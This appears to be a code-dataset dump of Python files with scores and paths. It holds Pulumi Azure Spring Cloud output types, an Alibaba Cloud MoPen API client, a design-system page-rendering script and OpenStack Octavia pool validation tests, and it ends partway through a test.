pulumi.set(__self__, "http_basic_auths", http_basic_auths)
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "patterns", patterns)
pulumi.set(__self__, "search_paths", search_paths)
pulumi.set(__self__, "ssh_auths", ssh_auths)
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="httpBasicAuths")
def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auths")
@property
@pulumi.getter
def label(self) -> str:
"""
The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def name(self) -> str:
"""
Specifies The name of the Spring Cloud Service resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def patterns(self) -> Sequence[str]:
"""
An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
"""
return pulumi.get(self, "patterns")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Sequence[str]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuths")
def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auths")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository
"""
return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Http Basic Authentication Git repository server.
:param str username: The username used to access the Http Basic Authentication Git repository server.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult(dict):
def __init__(__self__, *,
host_key: str,
host_key_algorithm: str,
private_key: str,
strict_host_key_checking_enabled: bool):
"""
:param str host_key: The host key of the Git repository server.
:param str host_key_algorithm: The host key algorithm.
:param str private_key: The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "host_key", host_key)
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
pulumi.set(__self__, "private_key", private_key)
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> str:
"""
The host key of the Git repository server.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> str:
"""
The host key algorithm.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> bool:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingSshAuthResult(dict):
def __init__(__self__, *,
host_key: str,
host_key_algorithm: str,
private_key: str,
strict_host_key_checking_enabled: bool):
"""
:param str host_key: The host key of the Git repository server.
:param str host_key_algorithm: The host key algorithm.
:param str private_key: The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "host_key", host_key)
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
pulumi.set(__self__, "private_key", private_key)
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> str:
"""
The host key of the Git repository server.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> str:
"""
The host key algorithm.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> bool:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceRequiredNetworkTrafficRuleResult(dict):
def __init__(__self__, *,
direction: str,
fqdns: Sequence[str],
ip_addresses: Sequence[str],
port: int,
protocol: str):
"""
:param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
:param Sequence[str] fqdns: The FQDN list of required traffic.
:param int port: The port of required traffic.
:param str protocol: The protocol of required traffic.
"""
pulumi.set(__self__, "direction", direction)
pulumi.set(__self__, "fqdns", fqdns)
pulumi.set(__self__, "ip_addresses", ip_addresses)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter
def direction(self) -> str:
"""
The direction of required traffic. Possible values are `Inbound`, `Outbound`.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def fqdns(self) -> Sequence[str]:
"""
The FQDN list of required traffic.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipAddresses")
def ip_addresses(self) -> Sequence[str]:
return pulumi.get(self, "ip_addresses")
@property
@pulumi.getter
def port(self) -> int:
"""
The port of required traffic.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> str:
"""
The protocol of required traffic.
"""
return pulumi.get(self, "protocol") | 0.840062 | 0.064065 |
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.request import APIRequest
from alibabacloud.utils.parameter_validation import verify_params
class MoPenClient(AlibabaCloudClient):
def __init__(self, client_config, credentials_provider=None, retry_policy=None,
endpoint_resolver=None):
AlibabaCloudClient.__init__(self, client_config,
credentials_provider=credentials_provider,
retry_policy=retry_policy,
endpoint_resolver=endpoint_resolver)
self.product_code = 'MoPen'
self.api_version = '2018-02-11'
self.location_service_code = 'mopen'
self.location_endpoint_type = 'openAPI'
def mo_pen_find_group(self, creator=None):
api_request = APIRequest('MoPenFindGroup', 'POST', 'https', 'RPC', 'body')
api_request._params = {"Creator": creator}
return self._handle_request(api_request).result
def mo_pen_query_canvas(self, device_name=None, session_id=None, page_id=None, status=None):
api_request = APIRequest('MoPenQueryCanvas', 'POST', 'https', 'RPC', 'body')
api_request._params = {
"DeviceName": device_name,
"SessionId": session_id,
"PageId": page_id,
"Status": status}
return self._handle_request(api_request).result
def mo_pen_do_recognize(
self,
canvas_id=None,
end_y=None,
end_x=None,
json_conf=None,
export_type=None,
start_y=None,
start_x=None):
api_request = APIRequest('MoPenDoRecognize', 'POST', 'https', 'RPC', 'body')
api_request._params = {
"CanvasId": canvas_id,
"EndY": end_y,
"EndX": end_x,
"JsonConf": json_conf,
"ExportType": export_type,
"StartY": start_y,
"StartX": start_x}
return self._handle_request(api_request).result
def mo_pen_send_mqtt_message(self, payload=None, device_name=None):
api_request = APIRequest('MoPenSendMqttMessage', 'POST', 'https', 'RPC', 'body')
api_request._params = {"Payload": payload, "DeviceName": device_name}
return self._handle_request(api_request).result
def mopen_create_group(self, creator=None):
api_request = APIRequest('MopenCreateGroup', 'POST', 'https', 'RPC', 'body')
api_request._params = {"Creator": creator}
return self._handle_request(api_request).result
def mo_pen_add_group_member(self, group_id=None, device_name=None):
api_request = APIRequest('MoPenAddGroupMember', 'POST', 'https', 'RPC', 'body')
api_request._params = {"GroupId": group_id, "DeviceName": device_name}
return self._handle_request(api_request).result
def mo_pen_delete_group(self, group_id=None):
api_request = APIRequest('MoPenDeleteGroup', 'POST', 'https', 'RPC', 'body')
api_request._params = {"GroupId": group_id}
return self._handle_request(api_request).result
def mo_pen_bind_isv(self, order_key=None, device_name=None):
api_request = APIRequest('MoPenBindIsv', 'POST', 'https', 'RPC', 'body')
api_request._params = {"OrderKey": order_key, "DeviceName": device_name}
return self._handle_request(api_request).result
def mo_pen_delete_group_member(self, group_id=None, device_name=None):
api_request = APIRequest('MoPenDeleteGroupMember', 'POST', 'https', 'RPC', 'body')
api_request._params = {"GroupId": group_id, "DeviceName": device_name}
return self._handle_request(api_request).result
def mo_pen_create_device(self, device_name=None, device_type=None):
api_request = APIRequest('MoPenCreateDevice', 'POST', 'https', 'RPC', 'body')
api_request._params = {"DeviceName": device_name, "DeviceType": device_type}
return self._handle_request(api_request).result | alibabacloud/clients/mopen_20180211.py |
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.request import APIRequest
from alibabacloud.utils.parameter_validation import verify_params
class MoPenClient(AlibabaCloudClient):
def __init__(self, client_config, credentials_provider=None, retry_policy=None,
endpoint_resolver=None):
AlibabaCloudClient.__init__(self, client_config,
credentials_provider=credentials_provider,
retry_policy=retry_policy,
endpoint_resolver=endpoint_resolver)
self.product_code = 'MoPen'
self.api_version = '2018-02-11'
self.location_service_code = 'mopen'
self.location_endpoint_type = 'openAPI'
def mo_pen_find_group(self, creator=None):
api_request = APIRequest('MoPenFindGroup', 'POST', 'https', 'RPC', 'body')
api_request._params = {"Creator": creator}
return self._handle_request(api_request).result
def mo_pen_query_canvas(self, device_name=None, session_id=None, page_id=None, status=None):
api_request = APIRequest('MoPenQueryCanvas', 'POST', 'https', 'RPC', 'body')
api_request._params = {
"DeviceName": device_name,
"SessionId": session_id,
"PageId": page_id,
"Status": status}
return self._handle_request(api_request).result
def mo_pen_do_recognize(
self,
canvas_id=None,
end_y=None,
end_x=None,
json_conf=None,
export_type=None,
start_y=None,
start_x=None):
api_request = APIRequest('MoPenDoRecognize', 'POST', 'https', 'RPC', 'body')
api_request._params = {
"CanvasId": canvas_id,
"EndY": end_y,
"EndX": end_x,
"JsonConf": json_conf,
"ExportType": export_type,
"StartY": start_y,
"StartX": start_x}
return self._handle_request(api_request).result
def mo_pen_send_mqtt_message(self, payload=None, device_name=None):
api_request = APIRequest('MoPenSendMqttMessage', 'POST', 'https', 'RPC', 'body')
api_request._params = {"Payload": payload, "DeviceName": device_name}
return self._handle_request(api_request).result
def mopen_create_group(self, creator=None):
api_request = APIRequest('MopenCreateGroup', 'POST', 'https', 'RPC', 'body')
api_request._params = {"Creator": creator}
return self._handle_request(api_request).result
def mo_pen_add_group_member(self, group_id=None, device_name=None):
api_request = APIRequest('MoPenAddGroupMember', 'POST', 'https', 'RPC', 'body')
api_request._params = {"GroupId": group_id, "DeviceName": device_name}
return self._handle_request(api_request).result
def mo_pen_delete_group(self, group_id=None):
api_request = APIRequest('MoPenDeleteGroup', 'POST', 'https', 'RPC', 'body')
api_request._params = {"GroupId": group_id}
return self._handle_request(api_request).result
def mo_pen_bind_isv(self, order_key=None, device_name=None):
api_request = APIRequest('MoPenBindIsv', 'POST', 'https', 'RPC', 'body')
api_request._params = {"OrderKey": order_key, "DeviceName": device_name}
return self._handle_request(api_request).result
def mo_pen_delete_group_member(self, group_id=None, device_name=None):
api_request = APIRequest('MoPenDeleteGroupMember', 'POST', 'https', 'RPC', 'body')
api_request._params = {"GroupId": group_id, "DeviceName": device_name}
return self._handle_request(api_request).result
def mo_pen_create_device(self, device_name=None, device_type=None):
api_request = APIRequest('MoPenCreateDevice', 'POST', 'https', 'RPC', 'body')
api_request._params = {"DeviceName": device_name, "DeviceType": device_type}
return self._handle_request(api_request).result | 0.561816 | 0.106505 |
import os
import sys
import glob
import jinja2
import codecs
import markdown
from bin.jinja_setup import setup_jinja
from bin.markdown_jinja import MarkdownJinja
from frontend.digital_land_frontend.filters import organisation_mapper
from frontmatter import Frontmatter
docs = "docs/"
def render(path, template, **kwargs):
path = os.path.join(docs, path)
directory = os.path.dirname(path)
if not os.path.exists(directory):
os.makedirs(directory)
with open(path, "w") as f:
f.write(template.render(**kwargs))
env = setup_jinja()
# get page templates
index_template = env.get_template("index.html")
get_started_template = env.get_template("getting-started.html")
example_template = env.get_template("iframe-base.html")
component_template = env.get_template("component-page.html")
# data for organisation autocomplete
orgs = [
{"value": k, "text": v} for k, v in organisation_mapper.organisations.all().items()
]
# init markdown
# give it access to the configured jinja.environment
# and any macros that might be used in the markdown files
md = markdown.Markdown(
extensions=[
MarkdownJinja(
env=env,
macros={
"designSystemExample": "design-system/components/example/macro.html"
},
),
"fenced_code",
"tables",
]
)
def compile_markdown(s):
html = md.convert(s)
html = html.replace("<p>", '<p class="govuk-body">')
html = html.replace("<h1>", '<h1 class="govuk-heading-xl">')
html = html.replace("<h2>", '<h2 class="govuk-heading-l">')
html = html.replace("<h3>", '<h3 class="govuk-heading-m">')
html = html.replace("<h4>", '<h4 class="govuk-heading-s">')
html = html.replace("<ul>", '<ul class="govuk-list govuk-list--bullet">')
html = html.replace("<pre>", '<pre class="hljs-container">')
html = html.replace("<table", '<table class="govuk-table" ')
html = html.replace("<thead>", '<thead class="govuk-table__head">')
html = html.replace("<tbody>", '<tbody class="govuk-table__body">')
html = html.replace("<tr>", '<tr class="govuk-table__row">')
html = html.replace("<th>", '<th scope="row" class="govuk-table__header">')
html = html.replace("<td>", '<td class="govuk-table__cell">')
return html
def read_markdown_file(p):
_content = codecs.open(
p,
mode="r",
)
return _content.read()
def render_markdown_file(file_, dest_file, template, **kwargs):
markdown_content = read_markdown_file(file_)
render(
dest_file,
template,
rendered_markdown=compile_markdown(markdown_content),
**kwargs,
)
def get_components(components_dir):
components = []
component_dirs = [d[0] for d in os.walk(components_dir)]
for c in component_dirs:
components.append(c.split("/")[-1])
# don't need to include component dir
if "components" in components:
components.remove("components")
return components
def render_example_pages(name, src_dir, dest, jinja_path, **kwargs):
for file in glob.glob(f"{src_dir}/{name}/*.html"):
# don't want to render pages for the macro files
if not "macro.html" in file:
example = os.path.basename(file)
render(
f"{dest}/{name}/{example}",
example_template,
partial_name=f"{jinja_path}/{name}/{example}",
**kwargs,
)
def is_displaying_map(documentation):
if documentation["attributes"] is not None:
return documentation["attributes"].get("contains_map")
return None
def reqs_org_data(documentation):
if documentation["attributes"] is not None:
return documentation["attributes"].get("requires_orgs")
return None
def generate_component_documentation_pages(component_sets):
for cset in component_sets:
src_dir = f"src/{cset['type']}/components"
components = get_components(src_dir)
for component in components:
jinja_input_path = f"examples/{cset['type']}/components"
documentation_path = f"{src_dir}/{component}/README.md"
if os.path.isfile(documentation_path):
documentation = Frontmatter.read_file(documentation_path)
# render the documentation page for the component
render(
f"{cset['dest']}/{component}/index.html",
component_template,
rendered_markdown=compile_markdown(documentation["body"]),
section=cset["dest"],
)
extras = {
"display_map": is_displaying_map(documentation),
}
if reqs_org_data is not None:
extras["organisation_data"] = orgs
# render all examples for component
render_example_pages(
component, src_dir, cset["dest"], jinja_input_path, **extras
)
else:
print(f"No documentation for component: {component}")
def generate_template_documentation_pages(directory):
for p in os.listdir(directory):
output_root = directory.replace("src/digital-land/templates", "template")
if os.path.isdir(os.path.join(directory, p)):
generate_template_documentation_pages(os.path.join(directory, p))
elif p.endswith(".md"):
documentation = Frontmatter.read_file(f"{directory}/{p}")
dest = (
os.path.join(output_root, "index.html")
if p == "index.md"
else os.path.join(output_root, p.replace(".md", ""), "index.html")
)
# render the documentation page for the template
render(
dest,
component_template,
rendered_markdown=compile_markdown(documentation["body"]),
section="template",
)
else:
include_path = os.path.join(directory, p).replace("src", "examples")
render(
os.path.join(output_root, p),
example_template,
partial_name=include_path,
)
def generate_design_system():
# generate all component docs and examples
component_sets = [
{"type": "digital-land", "dest": "components"},
{"type": "govuk", "dest": "govuk-components"},
]
generate_component_documentation_pages(component_sets)
generate_template_documentation_pages("src/digital-land/templates")
# generate the index pages
render("index.html", index_template)
render("get-started/index.html", get_started_template)
render_markdown_file(
"src/guides/get-started.md", "get-started/index.html", get_started_template
)
render_markdown_file(
"src/govuk/components/README.md",
"govuk-components/index.html",
component_template,
section="govuk-components",
)
render_markdown_file(
"src/digital-land/components/README.md",
"components/index.html",
component_template,
section="components",
)
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "--local":
env.globals["staticPath"] = "/static"
env.globals["urlPath"] = ""
generate_design_system() | render.py |
import os
import sys
import glob
import jinja2
import codecs
import markdown
from bin.jinja_setup import setup_jinja
from bin.markdown_jinja import MarkdownJinja
from frontend.digital_land_frontend.filters import organisation_mapper
from frontmatter import Frontmatter
docs = "docs/"
def render(path, template, **kwargs):
path = os.path.join(docs, path)
directory = os.path.dirname(path)
if not os.path.exists(directory):
os.makedirs(directory)
with open(path, "w") as f:
f.write(template.render(**kwargs))
env = setup_jinja()
# get page templates
index_template = env.get_template("index.html")
get_started_template = env.get_template("getting-started.html")
example_template = env.get_template("iframe-base.html")
component_template = env.get_template("component-page.html")
# data for organisation autocomplete
orgs = [
{"value": k, "text": v} for k, v in organisation_mapper.organisations.all().items()
]
# init markdown
# give it access to the configured jinja.environment
# and any macros that might be used in the markdown files
md = markdown.Markdown(
extensions=[
MarkdownJinja(
env=env,
macros={
"designSystemExample": "design-system/components/example/macro.html"
},
),
"fenced_code",
"tables",
]
)
def compile_markdown(s):
html = md.convert(s)
html = html.replace("<p>", '<p class="govuk-body">')
html = html.replace("<h1>", '<h1 class="govuk-heading-xl">')
html = html.replace("<h2>", '<h2 class="govuk-heading-l">')
html = html.replace("<h3>", '<h3 class="govuk-heading-m">')
html = html.replace("<h4>", '<h4 class="govuk-heading-s">')
html = html.replace("<ul>", '<ul class="govuk-list govuk-list--bullet">')
html = html.replace("<pre>", '<pre class="hljs-container">')
html = html.replace("<table", '<table class="govuk-table" ')
html = html.replace("<thead>", '<thead class="govuk-table__head">')
html = html.replace("<tbody>", '<tbody class="govuk-table__body">')
html = html.replace("<tr>", '<tr class="govuk-table__row">')
html = html.replace("<th>", '<th scope="row" class="govuk-table__header">')
html = html.replace("<td>", '<td class="govuk-table__cell">')
return html
def read_markdown_file(p):
_content = codecs.open(
p,
mode="r",
)
return _content.read()
def render_markdown_file(file_, dest_file, template, **kwargs):
markdown_content = read_markdown_file(file_)
render(
dest_file,
template,
rendered_markdown=compile_markdown(markdown_content),
**kwargs,
)
def get_components(components_dir):
components = []
component_dirs = [d[0] for d in os.walk(components_dir)]
for c in component_dirs:
components.append(c.split("/")[-1])
# don't need to include component dir
if "components" in components:
components.remove("components")
return components
def render_example_pages(name, src_dir, dest, jinja_path, **kwargs):
for file in glob.glob(f"{src_dir}/{name}/*.html"):
# don't want to render pages for the macro files
if not "macro.html" in file:
example = os.path.basename(file)
render(
f"{dest}/{name}/{example}",
example_template,
partial_name=f"{jinja_path}/{name}/{example}",
**kwargs,
)
def is_displaying_map(documentation):
if documentation["attributes"] is not None:
return documentation["attributes"].get("contains_map")
return None
def reqs_org_data(documentation):
if documentation["attributes"] is not None:
return documentation["attributes"].get("requires_orgs")
return None
def generate_component_documentation_pages(component_sets):
for cset in component_sets:
src_dir = f"src/{cset['type']}/components"
components = get_components(src_dir)
for component in components:
jinja_input_path = f"examples/{cset['type']}/components"
documentation_path = f"{src_dir}/{component}/README.md"
if os.path.isfile(documentation_path):
documentation = Frontmatter.read_file(documentation_path)
# render the documentation page for the component
render(
f"{cset['dest']}/{component}/index.html",
component_template,
rendered_markdown=compile_markdown(documentation["body"]),
section=cset["dest"],
)
extras = {
"display_map": is_displaying_map(documentation),
}
if reqs_org_data is not None:
extras["organisation_data"] = orgs
# render all examples for component
render_example_pages(
component, src_dir, cset["dest"], jinja_input_path, **extras
)
else:
print(f"No documentation for component: {component}")
def generate_template_documentation_pages(directory):
for p in os.listdir(directory):
output_root = directory.replace("src/digital-land/templates", "template")
if os.path.isdir(os.path.join(directory, p)):
generate_template_documentation_pages(os.path.join(directory, p))
elif p.endswith(".md"):
documentation = Frontmatter.read_file(f"{directory}/{p}")
dest = (
os.path.join(output_root, "index.html")
if p == "index.md"
else os.path.join(output_root, p.replace(".md", ""), "index.html")
)
# render the documentation page for the template
render(
dest,
component_template,
rendered_markdown=compile_markdown(documentation["body"]),
section="template",
)
else:
include_path = os.path.join(directory, p).replace("src", "examples")
render(
os.path.join(output_root, p),
example_template,
partial_name=include_path,
)
def generate_design_system():
# generate all component docs and examples
component_sets = [
{"type": "digital-land", "dest": "components"},
{"type": "govuk", "dest": "govuk-components"},
]
generate_component_documentation_pages(component_sets)
generate_template_documentation_pages("src/digital-land/templates")
# generate the index pages
render("index.html", index_template)
render("get-started/index.html", get_started_template)
render_markdown_file(
"src/guides/get-started.md", "get-started/index.html", get_started_template
)
render_markdown_file(
"src/govuk/components/README.md",
"govuk-components/index.html",
component_template,
section="govuk-components",
)
render_markdown_file(
"src/digital-land/components/README.md",
"components/index.html",
component_template,
section="components",
)
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "--local":
env.globals["staticPath"] = "/static"
env.globals["urlPath"] = ""
generate_design_system() | 0.341802 | 0.110663 |
from oslo_utils import uuidutils
from wsme import exc
from wsme.rest import json as wsme_json
from wsme import types as wsme_types
from octavia.api.v2.types import pool as pool_type
from octavia.common import constants
from octavia.tests.unit.api.common import base
class TestSessionPersistence(object):
_type = None
def test_session_persistence(self):
body = {"type": constants.SESSION_PERSISTENCE_HTTP_COOKIE}
sp = wsme_json.fromjson(self._type, body)
self.assertIsNotNone(sp.type)
def test_invalid_type(self):
body = {"type": "source_ip"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_cookie_name(self):
body = {"type": constants.SESSION_PERSISTENCE_HTTP_COOKIE,
"cookie_name": 10}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
class TestPoolPOST(base.BaseTypesTest):
_type = pool_type.PoolPOST
def test_pool(self):
body = {
"loadbalancer_id": uuidutils.generate_uuid(),
"listener_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
pool = wsme_json.fromjson(self._type, body)
self.assertTrue(pool.admin_state_up)
def test_load_balancer_mandatory(self):
body = {"loadbalancer_id": uuidutils.generate_uuid()}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_protocol_mandatory(self):
body = {"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_lb_algorithm_mandatory(self):
body = {"protocol": constants.PROTOCOL_HTTP}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_name(self):
body = {"name": 10,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_description(self):
body = {"description": 10,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_name(self):
body = {"name": "n" * 256,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_description(self):
body = {"description": "d" * 256,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_load_balacer_id(self):
body = {"loadbalancer_id": 10,
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_protocol(self):
body = {"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": "http",
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_lb_algorithm(self):
body = {"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": "source_ip"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_non_uuid_project_id(self):
body = {"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN,
"project_id": "non-uuid"}
pool = wsme_json.fromjson(self._type, body)
self.assertEqual(pool.project_id, body['project_id'])
class TestPoolPUT(base.BaseTypesTest):
_type = pool_type.PoolPUT
def test_pool(self):
body = {"name": "test_name"}
pool = wsme_json.fromjson(self._type, body)
self.assertEqual(wsme_types.Unset, pool.admin_state_up)
def test_invalid_name(self):
body = {"name": 10}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_name(self):
body = {"name": "n" * 256}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_description(self):
body = {"description": "d" * 256}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_description(self):
body = {"description": 10}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_lb_algorithm(self):
body = {"lb_algorithm": "source_ip"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
class TestSessionPersistencePOST(base.BaseTypesTest, TestSessionPersistence):
_type = pool_type.SessionPersistencePOST
def test_type_mandatory(self):
body = {"cookie_name": "test_name"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
class TestSessionPersistencePUT(base.BaseTypesTest, TestSessionPersistence):
_type = pool_type.SessionPersistencePUT | zuul.d/octavia/tests/unit/api/v2/types/test_pools.py |
from oslo_utils import uuidutils
from wsme import exc
from wsme.rest import json as wsme_json
from wsme import types as wsme_types
from octavia.api.v2.types import pool as pool_type
from octavia.common import constants
from octavia.tests.unit.api.common import base
class TestSessionPersistence(object):
_type = None
def test_session_persistence(self):
body = {"type": constants.SESSION_PERSISTENCE_HTTP_COOKIE}
sp = wsme_json.fromjson(self._type, body)
self.assertIsNotNone(sp.type)
def test_invalid_type(self):
body = {"type": "source_ip"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_cookie_name(self):
body = {"type": constants.SESSION_PERSISTENCE_HTTP_COOKIE,
"cookie_name": 10}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
class TestPoolPOST(base.BaseTypesTest):
_type = pool_type.PoolPOST
def test_pool(self):
body = {
"loadbalancer_id": uuidutils.generate_uuid(),
"listener_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
pool = wsme_json.fromjson(self._type, body)
self.assertTrue(pool.admin_state_up)
def test_load_balancer_mandatory(self):
body = {"loadbalancer_id": uuidutils.generate_uuid()}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_protocol_mandatory(self):
body = {"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_lb_algorithm_mandatory(self):
body = {"protocol": constants.PROTOCOL_HTTP}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_name(self):
body = {"name": 10,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_description(self):
body = {"description": 10,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_name(self):
body = {"name": "n" * 256,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_description(self):
body = {"description": "d" * 256,
"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_load_balacer_id(self):
body = {"loadbalancer_id": 10,
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_protocol(self):
body = {"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": "http",
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_lb_algorithm(self):
body = {"loadbalancer_id": uuidutils.generate_uuid(),
